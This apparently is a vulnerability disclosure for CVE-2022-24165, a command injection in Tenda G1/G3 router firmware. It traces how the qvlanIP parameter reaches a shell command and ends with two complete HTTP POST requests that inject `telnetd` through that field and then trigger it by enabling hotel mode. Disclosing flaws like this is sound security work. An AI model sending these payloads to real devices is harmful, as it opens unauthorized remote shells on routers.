Headline
CVE-2022-24165: my_vuln/38.md at main · pjqwudi/my_vuln
Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetQvlanList. This vulnerability allows attackers to execute arbitrary commands via the qvlanIP parameter.
Tenda Vulnerability
Vendor:Tenda
Product:G1、G3
Version:V15.11.0.17(9502)_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In httpd binary:
In formSetQvlanList function, qvlanIP is directly passed by the attacker, so we can control the qvlanIP to attack the OS.
First, make corresponding settings according to the selected network mode. This vulnerability occurs in the formSetHotelMode function. We mainly explain the data flow of this part.
This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.It should be noted that here you need to ensure that the value of wans.policy.type is 0.
In netctrl binary:
In advance_set_hotel_mode_cfg function, the initial input will be extracted and cause command injection.
Where does the value of pVlanCfg->Cfg[ida].vlanIp come from?
In advance_get_vlan_base_cfg function
Where does the value of vlan.tag.list%d come from?
In httpd binary:
In formSetQvlanList function
Supplement
The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.
Vulnerability trigger steps:
- set
qvlanIP=telent, in (formSetQvlanList) - set hotel mode, in (
formSetHotelMode)
PoC
set qvlanIP =telent, in (formSetQvlanList)
POST /goform/setQvlanList HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 140 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/network/vlanSet.html?0.8356422902255819 Cookie: _:USERNAME:_=; G3v3_user=
qvlanIndex=0&qvlanAction=add&qvlanPhyPort=1&qvlanEn=true&qvlanId=10&qvlanName=pjqwudi&qvlanIP=`telnetd`&qvlanMask=255.255.255.0&qvlanRemark=
set hotel mode, in (formSetHotelMode)
POST /goform/setHotelModeInfo HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 16 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/network/plugAndPlay.html?0.7948986057914317 Cookie: _:USERNAME:_=; G3v3_user=
hotelModeEn=true
Result
The target router has enabled the telnet service.
